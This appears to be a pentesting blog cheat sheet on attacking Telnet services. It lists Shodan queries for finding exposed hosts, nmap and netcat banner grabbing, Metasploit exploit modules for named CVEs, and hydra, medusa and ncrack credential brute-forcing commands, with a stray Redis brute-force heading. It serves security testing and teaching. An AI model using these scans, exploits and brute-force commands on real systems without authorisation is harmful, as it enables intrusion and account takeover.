Home Telnet Pentesting Best Practices
Post
Cancel

Telnet Pentesting Best Practices

Posted Jun 4, 2022 Updated Jun 25, 2022
By 0xhav0c
1 min read

Telnet

Telnet usually uses port 23,992

What is Telnet?

Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.

1
2

PORT     STATE SERVICE               VERSION
23/tcp   open  telnet

Redis Password Authentication Bruteforcing Methods

1
2

#Metasploit Framework
msf> use auxiliary/scanner/redis/redis_login

Telnet Pentesting

https://www.shodan.io/static/img/favicon.png Shodan search query :
port:23
# You can use this command only on your shodan-cli : shodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000
1
2
3
4
5
6
7

telnet 10.10.x.x 23
nc 10.10.x.x 23
Nmap: banner
nc -vn 10.10.x.x 23
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 10.10.x.x
msf > use auxiliary/scanner/telnet/telnet_version
msf > use auxiliary/scanner/telnet/lantronix_telnet_version

Telnet version grabbing with metasploit module. Telnet version grabbing with metasploit module.

Connection Tools

Linux:

1

telnet -l username 10.10.x.x 23

Windows:

  • Putty

Telnet Vulnerabilities

Specific Vulnerabilities and Exploits

1
2
3
4
5
6
7
8
9
10
11
12
13
14

#BOF: FreeBSD 7.3 – 9.0; MIT Kerberos v5 Applications (krb5-appl) <= 1.0.2; Heimdal <= 1.5.1; GNU inetutils [CVE-2011-4862]
msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf > use exploit/linux/telnet/telnet_encrypt_keyid
msf > use exploit/freebsd/telnet/telnet_encrypt_keyid

#SenNet Optimal DataLogger <= V5.37c-1.43c; SenNet Solar Datalogger <= V5.03-1.56a; SenNet Multitask Meter <= V5.21a-1.18b [CVE-2017-6048] [TCP/5000]
msf > use auxiliary/scanner/telnet/satel_cmd_exec

#RuggedCom Rugged Operating System (ROS) Telnet backdoor [CVE-2012-1803]
Exploit-DB: 18779.txt
msf > use auxiliary/scanner/telnet/telnet_ruggedcom

#Lantronix Device Server V5.8.0.1 [UDP\30718]
msf > use auxiliary/scanner/telnet/lantronix_telnet_password

There are also product-based vulnerabilities and scripts for vulnerabilities.

IBM CICS:

1
2
3

#Nmap Scripts:
nmap --script=cics-enum -p 23 10.10.x.x
nmap --script=cics-user-enum -p 23 10.10.x.x

IBM TN32701:

1
2

#Nmap Scripts:
nmap --script tn3270-info,tn3270_screen 10.10.x.x

Telnet Credentials

Brute Forcing

1
2
3
4

hydra -t 2 -L users.list -P passwords.list -M TargetIPs.list -s 23 telnet
medusa -t 2 -T 2 -U users.list -P passwords.list -H TargetIPs.list -n 23 -M telnet
ncrack -g CL=2 -U users.list -P passwords.list -iL TargetIPs.list -p telnet:23 -oA Result.txt
msf > use auxiliary/scanner/telnet/telnet_login
pentesting protocols, telnet
pentesting telnet best practicies
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

FTP Pentesting Best Practices

Finger Pentesting Best Practices

Comments powered by Disqus.

Powered by 0xhav0c © 2022